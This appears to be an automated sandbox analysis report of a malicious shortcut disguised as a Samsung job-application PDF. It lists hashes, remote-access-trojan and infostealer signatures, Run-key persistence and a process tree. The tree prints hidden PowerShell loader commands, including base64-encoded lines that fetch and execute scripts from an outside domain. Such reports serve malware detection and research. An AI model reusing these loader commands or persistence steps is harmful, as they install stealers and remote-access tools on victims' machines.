Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 12:02
Static task
static1
Behavioral task
behavioral1
Sample
Samsung_Job_Application_Document.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Samsung_Job_Application_Document.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
Samsung_Job_Application_Document.pdf.lnk
-
Size
47.7MB
-
MD5
c2dbb808a94f755506367a63757d3007
-
SHA1
9dc8794486160c1b282f50b1e2aa234c77c17c84
-
SHA256
b55282e00322a4e28d888c1c252218251366f45639ba5212829e4b3d25dbc50e
-
SHA512
c59e52c3b7b74ab5b88d7a8b17a8c8aaaf3aaf9af07dd838d6b785442fef4811e1c01f4aa136e0eef631bce636b9fa652a12a968aa3114d03d911557658370e9
-
SSDEEP
24:8DiJ6Kx96xxuJB5J+/ZehoCiyng48HGbuOk6OYuOdZqddqVRVXuHYSJmrS:8DhKzhJPQ+oAg6SOHOxOdkd0tXuHdJ2
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3456-108-0x0000000000400000-0x000000000064A000-memory.dmp family_stormkitty -
Stormkitty family
-
Processes:
resource yara_rule behavioral2/memory/3456-108-0x0000000000400000-0x000000000064A000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid Process 15 4176 powershell.exe 16 3272 powershell.exe 23 2388 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 2 IoCs
Processes:
EdgeServices.exeChromeServices.exepid Process 2100 EdgeServices.exe 3004 ChromeServices.exe -
Loads dropped DLL 6 IoCs
Processes:
EdgeServices.exeChromeServices.exepid Process 2100 EdgeServices.exe 2100 EdgeServices.exe 2100 EdgeServices.exe 2100 EdgeServices.exe 2100 EdgeServices.exe 3004 ChromeServices.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeServices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\EdgeServices\" \"C:\\Users\\Public\\Downloads\\EdgeServices\\EdgeServices.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeServices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\ChromeServices\" \"C:\\Users\\Public\\Downloads\\ChromeServices\\ChromeServices.exe\"" powershell.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 7 IoCs
Processes:
EdgeServices.exedescription pid Process procid_target PID 2100 set thread context of 3456 2100 EdgeServices.exe 113 PID 2100 set thread context of 916 2100 EdgeServices.exe 115 PID 2100 set thread context of 3536 2100 EdgeServices.exe 116 PID 2100 set thread context of 876 2100 EdgeServices.exe 117 PID 2100 set thread context of 4760 2100 EdgeServices.exe 118 PID 2100 set thread context of 2112 2100 EdgeServices.exe 119 PID 2100 set thread context of 3004 2100 EdgeServices.exe 122 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RdrCEF.exeRdrCEF.exeRdrCEF.exeRdrCEF.exeRdrCEF.exeAddInProcess32.exemsbuild.exeAddInProcess32.exemsbuild.exeAcroRd32.exeRdrCEF.exeinstallutil.exeAddInProcess32.exeRdrCEF.exeAddInProcess32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exemsbuild.exeAcroRd32.exepid Process 4548 powershell.exe 4548 powershell.exe 4176 powershell.exe 4176 powershell.exe 3272 powershell.exe 3272 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe 3456 msbuild.exe 3456 msbuild.exe 3456 msbuild.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3456 msbuild.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exemsbuild.exeinstallutil.exeAddInProcess32.exeAddInProcess32.exemsbuild.exeAddInProcess32.exeAddInProcess32.exedescription pid Process Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4176 powershell.exe Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 3456 msbuild.exe Token: SeDebugPrivilege 916 installutil.exe Token: SeDebugPrivilege 3536 AddInProcess32.exe Token: SeDebugPrivilege 4760 AddInProcess32.exe Token: SeDebugPrivilege 3004 msbuild.exe Token: SeDebugPrivilege 876 AddInProcess32.exe Token: SeDebugPrivilege 2112 AddInProcess32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid Process 3660 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exemsbuild.exepid Process 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3660 AcroRd32.exe 3456 msbuild.exe 3660 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid Process procid_target PID 3580 wrote to memory of 3804 3580 cmd.exe 84 PID 3580 wrote to memory of 3804 3580 cmd.exe 84 PID 3804 wrote to memory of 4548 3804 cmd.exe 85 PID 3804 wrote to memory of 4548 3804 cmd.exe 85 PID 4548 wrote to memory of 4176 4548 powershell.exe 86 PID 4548 wrote to memory of 4176 4548 powershell.exe 86 PID 4176 wrote to memory of 3660 4176 powershell.exe 90 PID 4176 wrote to memory of 3660 4176 powershell.exe 90 PID 4176 wrote to memory of 3660 4176 powershell.exe 90 PID 4548 wrote to memory of 3272 4548 powershell.exe 91 PID 4548 wrote to memory of 3272 4548 powershell.exe 91 PID 3660 wrote to memory of 1992 3660 AcroRd32.exe 98 PID 3660 wrote to memory of 1992 3660 AcroRd32.exe 98 PID 3660 wrote to memory of 1992 3660 AcroRd32.exe 98 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 2768 1992 RdrCEF.exe 99 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100 PID 1992 wrote to memory of 208 1992 RdrCEF.exe 100
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Samsung_Job_Application_Document.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell -WindowStyle Hidden -Command "IEX (Get-Content (Get-ChildItem -Path C:\ -Filter 'Samsungwork.bin' -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -First 1).FullName -Raw)"2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "IEX (Get-Content (Get-ChildItem -Path C:\ -Filter 'Samsungwork.bin' -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -First 1).FullName -Raw)"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAF8AcABkAGYALgB0AHgAdAAnACkA4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Samsung Application Document.pdf"5⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140436⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FFCB460DD0CDE3CB1B3309E611F45518 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DD066CE1FD3AE4126AD65A6F4A16569F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DD066CE1FD3AE4126AD65A6F4A16569F --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:17⤵
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=058CF2370150BB08B7A37AD85861187D --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=003A9E9D84A1F14AD7CC66BE07B04187 --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
- System Location Discovery: System Language Discovery
PID:3488
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7034553F1E6030DCF02D448191AA42EF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7034553F1E6030DCF02D448191AA42EF --renderer-client-id=6 --mojo-platform-channel-handle=2492 --allow-no-sandbox-job /prefetch:17⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C0F8D61EE1BF693623EEE4845AEE70E6 --mojo-platform-channel-handle=2912 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵
- System Location Discovery: System Language Discovery
PID:3776
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAC4AdAB4AHQAJwApAA==4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272 -
C:\Users\Public\Downloads\EdgeServices\EdgeServices.exe"C:\Users\Public\Downloads\EdgeServices\EdgeServices.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵PID:364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵PID:5036
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3456
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵PID:4268
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵PID:1568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵PID:4308
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAHMAdAAuAHQAeAB0ACcAKQA=4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Users\Public\Downloads\ChromeServices\ChromeServices.exe"C:\Users\Public\Downloads\ChromeServices\ChromeServices.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3004
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
